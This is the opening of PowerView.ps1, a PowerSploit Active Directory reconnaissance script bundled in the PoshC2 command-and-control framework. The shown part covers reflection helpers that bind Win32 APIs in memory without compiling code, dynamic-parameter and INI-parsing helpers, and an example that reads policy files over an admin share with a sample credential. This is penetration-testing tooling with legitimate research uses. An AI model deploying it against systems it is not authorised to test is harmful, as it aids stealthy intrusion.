PoshC2_Python/Modules/powerview.ps1

20474 lines
733 KiB
PowerShell

#requires -version 2
<#
PowerSploit File: PowerView.ps1
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
#>
########################################################
#
# PSReflect code for Windows API access
# Author: @mattifestation
# https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1
#
########################################################
function New-InMemoryModule {
<#
.SYNOPSIS
Creates an in-memory assembly and module
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
When defining custom enums, structs, and unmanaged functions, it is
necessary to associate to an assembly module. This helper function
creates an in-memory module that can be passed to the 'enum',
'struct', and Add-Win32Type functions.
.PARAMETER ModuleName
Specifies the desired name for the in-memory assembly and module. If
ModuleName is not provided, it will default to a GUID.
.EXAMPLE
$Module = New-InMemoryModule -ModuleName Win32
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[CmdletBinding()]
Param (
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
$AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
$LoadedAssemblies = $AppDomain.GetAssemblies()
foreach ($Assembly in $LoadedAssemblies) {
if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {
return $Assembly
}
}
$DynAssembly = New-Object Reflection.AssemblyName($ModuleName)
$Domain = $AppDomain
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)
return $ModuleBuilder
}
# A helper function used to reduce typing while defining function
# prototypes for Add-Win32Type.
function func {
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$DllName,
[Parameter(Position = 1, Mandatory = $True)]
[string]
$FunctionName,
[Parameter(Position = 2, Mandatory = $True)]
[Type]
$ReturnType,
[Parameter(Position = 3)]
[Type[]]
$ParameterTypes,
[Parameter(Position = 4)]
[Runtime.InteropServices.CallingConvention]
$NativeCallingConvention,
[Parameter(Position = 5)]
[Runtime.InteropServices.CharSet]
$Charset,
[String]
$EntryPoint,
[Switch]
$SetLastError
)
$Properties = @{
DllName = $DllName
FunctionName = $FunctionName
ReturnType = $ReturnType
}
if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }
if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }
if ($Charset) { $Properties['Charset'] = $Charset }
if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }
if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }
New-Object PSObject -Property $Properties
}
function Add-Win32Type
{
<#
.SYNOPSIS
Creates a .NET type for an unmanaged Win32 function.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: func
.DESCRIPTION
Add-Win32Type enables you to easily interact with unmanaged (i.e.
Win32 unmanaged) functions in PowerShell. After providing
Add-Win32Type with a function signature, a .NET type is created
using reflection (i.e. csc.exe is never called like with Add-Type).
The 'func' helper function can be used to reduce typing when defining
multiple function definitions.
.PARAMETER DllName
The name of the DLL.
.PARAMETER FunctionName
The name of the target function.
.PARAMETER EntryPoint
The DLL export function name. This argument should be specified if the
specified function name is different than the name of the exported
function.
.PARAMETER ReturnType
The return type of the function.
.PARAMETER ParameterTypes
The function parameters.
.PARAMETER NativeCallingConvention
Specifies the native calling convention of the function. Defaults to
stdcall.
.PARAMETER Charset
If you need to explicitly call an 'A' or 'W' Win32 function, you can
specify the character set.
.PARAMETER SetLastError
Indicates whether the callee calls the SetLastError Win32 API
function before returning from the attributed method.
.PARAMETER Module
The in-memory module that will host the functions. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER Namespace
An optional namespace to prepend to the type. Add-Win32Type defaults
to a namespace consisting only of the name of the DLL.
.EXAMPLE
$Mod = New-InMemoryModule -ModuleName Win32
$FunctionDefinitions = @(
(func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),
(func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),
(func ntdll RtlGetCurrentPeb ([IntPtr]) @())
)
$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
$Kernel32 = $Types['kernel32']
$Ntdll = $Types['ntdll']
$Ntdll::RtlGetCurrentPeb()
$ntdllbase = $Kernel32::GetModuleHandle('ntdll')
$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
.NOTES
Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
When defining multiple function prototypes, it is ideal to provide
Add-Win32Type with an array of function signatures. That way, they
are all incorporated into the same in-memory module.
#>
[OutputType([Hashtable])]
Param(
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[String]
$DllName,
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[String]
$FunctionName,
[Parameter(ValueFromPipelineByPropertyName=$True)]
[String]
$EntryPoint,
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
[Type]
$ReturnType,
[Parameter(ValueFromPipelineByPropertyName=$True)]
[Type[]]
$ParameterTypes,
[Parameter(ValueFromPipelineByPropertyName=$True)]
[Runtime.InteropServices.CallingConvention]
$NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,
[Parameter(ValueFromPipelineByPropertyName=$True)]
[Runtime.InteropServices.CharSet]
$Charset = [Runtime.InteropServices.CharSet]::Auto,
[Parameter(ValueFromPipelineByPropertyName=$True)]
[Switch]
$SetLastError,
[Parameter(Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Module,
[ValidateNotNull()]
[String]
$Namespace = ''
)
BEGIN
{
$TypeHash = @{}
}
PROCESS
{
if ($Module -is [Reflection.Assembly])
{
if ($Namespace)
{
$TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName")
}
else
{
$TypeHash[$DllName] = $Module.GetType($DllName)
}
}
else
{
# Define one type for each DLL
if (!$TypeHash.ContainsKey($DllName))
{
if ($Namespace)
{
$TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit')
}
else
{
$TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')
}
}
$Method = $TypeHash[$DllName].DefineMethod(
$FunctionName,
'Public,Static,PinvokeImpl',
$ReturnType,
$ParameterTypes)
# Make each ByRef parameter an Out parameter
$i = 1
foreach($Parameter in $ParameterTypes)
{
if ($Parameter.IsByRef)
{
[void] $Method.DefineParameter($i, 'Out', $null)
}
$i++
}
$DllImport = [Runtime.InteropServices.DllImportAttribute]
$SetLastErrorField = $DllImport.GetField('SetLastError')
$CallingConventionField = $DllImport.GetField('CallingConvention')
$CharsetField = $DllImport.GetField('CharSet')
$EntryPointField = $DllImport.GetField('EntryPoint')
if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }
if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }
# Equivalent to C# version of [DllImport(DllName)]
$Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])
$DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,
$DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),
[Reflection.FieldInfo[]] @($SetLastErrorField,
$CallingConventionField,
$CharsetField,
$EntryPointField),
[Object[]] @($SLEValue,
([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),
([Runtime.InteropServices.CharSet] $Charset),
$ExportedFuncName))
$Method.SetCustomAttribute($DllImportAttribute)
}
}
END
{
if ($Module -is [Reflection.Assembly])
{
return $TypeHash
}
$ReturnTypes = @{}
foreach ($Key in $TypeHash.Keys)
{
$Type = $TypeHash[$Key].CreateType()
$ReturnTypes[$Key] = $Type
}
return $ReturnTypes
}
}
function psenum {
<#
.SYNOPSIS
Creates an in-memory enumeration for use in your PowerShell session.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
The 'psenum' function facilitates the creation of enums entirely in
memory using as close to a "C style" as PowerShell will allow.
.PARAMETER Module
The in-memory module that will host the enum. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER FullName
The fully-qualified name of the enum.
.PARAMETER Type
The type of each enum element.
.PARAMETER EnumElements
A hashtable of enum elements.
.PARAMETER Bitfield
Specifies that the enum should be treated as a bitfield.
.EXAMPLE
$Mod = New-InMemoryModule -ModuleName Win32
$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
UNKNOWN = 0
NATIVE = 1 # Image doesn't require a subsystem.
WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem.
WINDOWS_CUI = 3 # Image runs in the Windows character subsystem.
OS2_CUI = 5 # Image runs in the OS/2 character subsystem.
POSIX_CUI = 7 # Image runs in the Posix character subsystem.
NATIVE_WINDOWS = 8 # Image is a native Win9x driver.
WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem.
EFI_APPLICATION = 10
EFI_BOOT_SERVICE_DRIVER = 11
EFI_RUNTIME_DRIVER = 12
EFI_ROM = 13
XBOX = 14
WINDOWS_BOOT_APPLICATION = 16
}
.NOTES
PowerShell purists may disagree with the naming of this function but
again, this was developed in such a way so as to emulate a "C style"
definition as closely as possible. Sorry, I'm not going to name it
New-Enum. :P
#>
[OutputType([Type])]
Param (
[Parameter(Position = 0, Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Module,
[Parameter(Position = 1, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$FullName,
[Parameter(Position = 2, Mandatory=$True)]
[Type]
$Type,
[Parameter(Position = 3, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[Hashtable]
$EnumElements,
[Switch]
$Bitfield
)
if ($Module -is [Reflection.Assembly])
{
return ($Module.GetType($FullName))
}
$EnumType = $Type -as [Type]
$EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)
if ($Bitfield)
{
$FlagsConstructor = [FlagsAttribute].GetConstructor(@())
$FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())
$EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)
}
foreach ($Key in $EnumElements.Keys)
{
# Apply the specified enum type to each element
$null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
}
$EnumBuilder.CreateType()
}
# A helper function used to reduce typing while defining struct
# fields.
function field {
Param (
[Parameter(Position = 0, Mandatory=$True)]
[UInt16]
$Position,
[Parameter(Position = 1, Mandatory=$True)]
[Type]
$Type,
[Parameter(Position = 2)]
[UInt16]
$Offset,
[Object[]]
$MarshalAs
)
@{
Position = $Position
Type = $Type -as [Type]
Offset = $Offset
MarshalAs = $MarshalAs
}
}
function struct
{
<#
.SYNOPSIS
Creates an in-memory struct for use in your PowerShell session.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: field
.DESCRIPTION
The 'struct' function facilitates the creation of structs entirely in
memory using as close to a "C style" as PowerShell will allow. Struct
fields are specified using a hashtable where each field of the struct
is comprosed of the order in which it should be defined, its .NET
type, and optionally, its offset and special marshaling attributes.
One of the features of 'struct' is that after your struct is defined,
it will come with a built-in GetSize method as well as an explicit
converter so that you can easily cast an IntPtr to the struct without
relying upon calling SizeOf and/or PtrToStructure in the Marshal
class.
.PARAMETER Module
The in-memory module that will host the struct. Use
New-InMemoryModule to define an in-memory module.
.PARAMETER FullName
The fully-qualified name of the struct.
.PARAMETER StructFields
A hashtable of fields. Use the 'field' helper function to ease
defining each field.
.PARAMETER PackingSize
Specifies the memory alignment of fields.
.PARAMETER ExplicitLayout
Indicates that an explicit offset for each field will be specified.
.EXAMPLE
$Mod = New-InMemoryModule -ModuleName Win32
$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
DOS_SIGNATURE = 0x5A4D
OS2_SIGNATURE = 0x454E
OS2_SIGNATURE_LE = 0x454C
VXD_SIGNATURE = 0x454C
}
$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
e_magic = field 0 $ImageDosSignature
e_cblp = field 1 UInt16
e_cp = field 2 UInt16
e_crlc = field 3 UInt16
e_cparhdr = field 4 UInt16
e_minalloc = field 5 UInt16
e_maxalloc = field 6 UInt16
e_ss = field 7 UInt16
e_sp = field 8 UInt16
e_csum = field 9 UInt16
e_ip = field 10 UInt16
e_cs = field 11 UInt16
e_lfarlc = field 12 UInt16
e_ovno = field 13 UInt16
e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4)
e_oemid = field 15 UInt16
e_oeminfo = field 16 UInt16
e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10)
e_lfanew = field 18 Int32
}
# Example of using an explicit layout in order to create a union.
$TestUnion = struct $Mod TestUnion @{
field1 = field 0 UInt32 0
field2 = field 1 IntPtr 0
} -ExplicitLayout
.NOTES
PowerShell purists may disagree with the naming of this function but
again, this was developed in such a way so as to emulate a "C style"
definition as closely as possible. Sorry, I'm not going to name it
New-Struct. :P
#>
[OutputType([Type])]
Param (
[Parameter(Position = 1, Mandatory=$True)]
[ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
$Module,
[Parameter(Position = 2, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[String]
$FullName,
[Parameter(Position = 3, Mandatory=$True)]
[ValidateNotNullOrEmpty()]
[Hashtable]
$StructFields,
[Reflection.Emit.PackingSize]
$PackingSize = [Reflection.Emit.PackingSize]::Unspecified,
[Switch]
$ExplicitLayout
)
if ($Module -is [Reflection.Assembly])
{
return ($Module.GetType($FullName))
}
[Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,
Class,
Public,
Sealed,
BeforeFieldInit'
if ($ExplicitLayout)
{
$StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout
}
else
{
$StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout
}
$StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)
$ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
$SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
$Fields = New-Object Hashtable[]($StructFields.Count)
# Sort each field according to the orders specified
# Unfortunately, PSv2 doesn't have the luxury of the
# hashtable [Ordered] accelerator.
foreach ($Field in $StructFields.Keys)
{
$Index = $StructFields[$Field]['Position']
$Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}
}
foreach ($Field in $Fields)
{
$FieldName = $Field['FieldName']
$FieldProp = $Field['Properties']
$Offset = $FieldProp['Offset']
$Type = $FieldProp['Type']
$MarshalAs = $FieldProp['MarshalAs']
$NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')
if ($MarshalAs)
{
$UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])
if ($MarshalAs[1])
{
$Size = $MarshalAs[1]
$AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,
$UnmanagedType, $SizeConst, @($Size))
}
else
{
$AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))
}
$NewField.SetCustomAttribute($AttribBuilder)
}
if ($ExplicitLayout) { $NewField.SetOffset($Offset) }
}
# Make the struct aware of its own size.
# No more having to call [Runtime.InteropServices.Marshal]::SizeOf!
$SizeMethod = $StructBuilder.DefineMethod('GetSize',
'Public, Static',
[Int],
[Type[]] @())
$ILGenerator = $SizeMethod.GetILGenerator()
# Thanks for the help, Jason Shirk!
$ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
$ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,
[Type].GetMethod('GetTypeFromHandle'))
$ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,
[Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))
$ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)
# Allow for explicit casting from an IntPtr
# No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!
$ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',
'PrivateScope, Public, Static, HideBySig, SpecialName',
$StructBuilder,
[Type[]] @([IntPtr]))
$ILGenerator2 = $ImplicitConverter.GetILGenerator()
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,
[Type].GetMethod('GetTypeFromHandle'))
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,
[Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)
$ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)
$StructBuilder.CreateType()
}
########################################################
#
# Misc. helpers
#
########################################################
Function New-DynamicParameter {
<#
.SYNOPSIS
Helper function to simplify creating dynamic parameters.
Adapated from https://beatcracker.wordpress.com/2015/08/10/dynamic-parameters-validateset-and-enums/.
Originally released under the Microsoft Public License (Ms-PL).
.DESCRIPTION
Helper function to simplify creating dynamic parameters.
Example use cases:
Include parameters only if your environment dictates it
Include parameters depending on the value of a user-specified parameter
Provide tab completion and intellisense for parameters, depending on the environment
Please keep in mind that all dynamic parameters you create, will not have corresponding variables created.
Use New-DynamicParameter with 'CreateVariables' switch in your main code block,
('Process' for advanced functions) to create those variables.
Alternatively, manually reference $PSBoundParameters for the dynamic parameter value.
This function has two operating modes:
1. All dynamic parameters created in one pass using pipeline input to the function. This mode allows to create dynamic parameters en masse,
with one function call. There is no need to create and maintain custom RuntimeDefinedParameterDictionary.
2. Dynamic parameters are created by separate function calls and added to the RuntimeDefinedParameterDictionary you created beforehand.
Then you output this RuntimeDefinedParameterDictionary to the pipeline. This allows more fine-grained control of the dynamic parameters,
with custom conditions and so on.
.NOTES
Credits to jrich523 and ramblingcookiemonster for their initial code and inspiration:
https://github.com/RamblingCookieMonster/PowerShell/blob/master/New-DynamicParam.ps1
http://ramblingcookiemonster.wordpress.com/2014/11/27/quick-hits-credentials-and-dynamic-parameters/
http://jrich523.wordpress.com/2013/05/30/powershell-simple-way-to-add-dynamic-parameters-to-advanced-function/
Credit to BM for alias and type parameters and their handling
.PARAMETER Name
Name of the dynamic parameter
.PARAMETER Type
Type for the dynamic parameter. Default is string
.PARAMETER Alias
If specified, one or more aliases to assign to the dynamic parameter
.PARAMETER Mandatory
If specified, set the Mandatory attribute for this dynamic parameter
.PARAMETER Position
If specified, set the Position attribute for this dynamic parameter
.PARAMETER HelpMessage
If specified, set the HelpMessage for this dynamic parameter
.PARAMETER DontShow
If specified, set the DontShow for this dynamic parameter.
This is the new PowerShell 4.0 attribute that hides parameter from tab-completion.
http://www.powershellmagazine.com/2013/07/29/pstip-hiding-parameters-from-tab-completion/
.PARAMETER ValueFromPipeline
If specified, set the ValueFromPipeline attribute for this dynamic parameter
.PARAMETER ValueFromPipelineByPropertyName
If specified, set the ValueFromPipelineByPropertyName attribute for this dynamic parameter
.PARAMETER ValueFromRemainingArguments
If specified, set the ValueFromRemainingArguments attribute for this dynamic parameter
.PARAMETER ParameterSetName
If specified, set the ParameterSet attribute for this dynamic parameter. By default parameter is added to all parameters sets.
.PARAMETER AllowNull
If specified, set the AllowNull attribute of this dynamic parameter
.PARAMETER AllowEmptyString
If specified, set the AllowEmptyString attribute of this dynamic parameter
.PARAMETER AllowEmptyCollection
If specified, set the AllowEmptyCollection attribute of this dynamic parameter
.PARAMETER ValidateNotNull
If specified, set the ValidateNotNull attribute of this dynamic parameter
.PARAMETER ValidateNotNullOrEmpty
If specified, set the ValidateNotNullOrEmpty attribute of this dynamic parameter
.PARAMETER ValidateRange
If specified, set the ValidateRange attribute of this dynamic parameter
.PARAMETER ValidateLength
If specified, set the ValidateLength attribute of this dynamic parameter
.PARAMETER ValidatePattern
If specified, set the ValidatePattern attribute of this dynamic parameter
.PARAMETER ValidateScript
If specified, set the ValidateScript attribute of this dynamic parameter
.PARAMETER ValidateSet
If specified, set the ValidateSet attribute of this dynamic parameter
.PARAMETER Dictionary
If specified, add resulting RuntimeDefinedParameter to an existing RuntimeDefinedParameterDictionary.
Appropriate for custom dynamic parameters creation.
If not specified, create and return a RuntimeDefinedParameterDictionary
Appropriate for a simple dynamic parameter creation.
#>
[CmdletBinding(DefaultParameterSetName = 'DynamicParameter')]
Param (
[Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateNotNullOrEmpty()]
[string]$Name,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[System.Type]$Type = [int],
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[string[]]$Alias,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$Mandatory,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[int]$Position,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[string]$HelpMessage,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$DontShow,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$ValueFromPipeline,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$ValueFromPipelineByPropertyName,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$ValueFromRemainingArguments,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[string]$ParameterSetName = '__AllParameterSets',
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$AllowNull,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$AllowEmptyString,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$AllowEmptyCollection,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$ValidateNotNull,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[switch]$ValidateNotNullOrEmpty,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateCount(2,2)]
[int[]]$ValidateCount,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateCount(2,2)]
[int[]]$ValidateRange,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateCount(2,2)]
[int[]]$ValidateLength,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateNotNullOrEmpty()]
[string]$ValidatePattern,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateNotNullOrEmpty()]
[scriptblock]$ValidateScript,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateNotNullOrEmpty()]
[string[]]$ValidateSet,
[Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]
[ValidateNotNullOrEmpty()]
[ValidateScript({
if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary]))
{
Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object'
}
$true
})]
$Dictionary = $false,
[Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')]
[switch]$CreateVariables,
[Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')]
[ValidateNotNullOrEmpty()]
[ValidateScript({
# System.Management.Automation.PSBoundParametersDictionary is an internal sealed class,
# so one can't use PowerShell's '-is' operator to validate type.
if($_.GetType().Name -notmatch 'Dictionary') {
Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object'
}
$true
})]
$BoundParameters
)
Begin {
$InternalDictionary = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary
function _temp { [CmdletBinding()] Param() }
$CommonParameters = (Get-Command _temp).Parameters.Keys
}
Process {
if($CreateVariables) {
$BoundKeys = $BoundParameters.Keys | Where-Object { $CommonParameters -notcontains $_ }
ForEach($Parameter in $BoundKeys) {
if ($Parameter) {
Set-Variable -Name $Parameter -Value $BoundParameters.$Parameter -Scope 1 -Force
}
}
}
else {
$StaleKeys = @()
$StaleKeys = $PSBoundParameters.GetEnumerator() |
ForEach-Object {
if($_.Value.PSobject.Methods.Name -match '^Equals$') {
# If object has Equals, compare bound key and variable using it
if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) {
$_.Key
}
}
else {
# If object doesn't has Equals (e.g. $null), fallback to the PowerShell's -ne operator
if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) {
$_.Key
}
}
}
if($StaleKeys) {
$StaleKeys | ForEach-Object {[void]$PSBoundParameters.Remove($_)}
}
# Since we rely solely on $PSBoundParameters, we don't have access to default values for unbound parameters
$UnboundParameters = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator() |
# Find parameters that are belong to the current parameter set
Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } |
Select-Object -ExpandProperty Key |
# Find unbound parameters in the current parameter set
Where-Object { $PSBoundParameters.Keys -notcontains $_ }
# Even if parameter is not bound, corresponding variable is created with parameter's default value (if specified)
$tmp = $null
ForEach ($Parameter in $UnboundParameters) {
$DefaultValue = Get-Variable -Name $Parameter -ValueOnly -Scope 0
if(!$PSBoundParameters.TryGetValue($Parameter, [ref]$tmp) -and $DefaultValue) {
$PSBoundParameters.$Parameter = $DefaultValue
}
}
if($Dictionary) {
$DPDictionary = $Dictionary
}
else {
$DPDictionary = $InternalDictionary
}
# Shortcut for getting local variables
$GetVar = {Get-Variable -Name $_ -ValueOnly -Scope 0}
# Strings to match attributes and validation arguments
$AttributeRegex = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$'
$ValidationRegex = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$'
$AliasRegex = '^Alias$'
$ParameterAttribute = New-Object -TypeName System.Management.Automation.ParameterAttribute
switch -regex ($PSBoundParameters.Keys) {
$AttributeRegex {
Try {
$ParameterAttribute.$_ = . $GetVar
}
Catch {
$_
}
continue
}
}
if($DPDictionary.Keys -contains $Name) {
$DPDictionary.$Name.Attributes.Add($ParameterAttribute)
}
else {
$AttributeCollection = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute]
switch -regex ($PSBoundParameters.Keys) {
$ValidationRegex {
Try {
$ParameterOptions = New-Object -TypeName "System.Management.Automation.${_}Attribute" -ArgumentList (. $GetVar) -ErrorAction Stop
$AttributeCollection.Add($ParameterOptions)
}
Catch { $_ }
continue
}
$AliasRegex {
Try {
$ParameterAlias = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $GetVar) -ErrorAction Stop
$AttributeCollection.Add($ParameterAlias)
continue
}
Catch { $_ }
}
}
$AttributeCollection.Add($ParameterAttribute)
$Parameter = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $AttributeCollection)
$DPDictionary.Add($Name, $Parameter)
}
}
}
End {
if(!$CreateVariables -and !$Dictionary) {
$DPDictionary
}
}
}
function Get-IniContent {
<#
.SYNOPSIS
This helper parses an .ini file into a hashtable.
Author: 'The Scripting Guys'
Modifications: @harmj0y (-Credential support)
License: BSD 3-Clause
Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
.DESCRIPTION
Parses an .ini file into a hashtable. If -Credential is supplied,
then Add-RemoteConnection is used to map \\COMPUTERNAME\IPC$, the file
is parsed, and then the connection is destroyed with Remove-RemoteConnection.
.PARAMETER Path
Specifies the path to the .ini file to parse.
.PARAMETER OutputObject
Switch. Output a custom PSObject instead of a hashtable.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system.
.EXAMPLE
Get-IniContent C:\Windows\example.ini
.EXAMPLE
"C:\Windows\example.ini" | Get-IniContent -OutputObject
Outputs the .ini details as a proper nested PSObject.
.EXAMPLE
"C:\Windows\example.ini" | Get-IniContent
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-IniContent -Path \\PRIMARY.testlab.local\C$\Temp\GptTmpl.inf -Credential $Cred
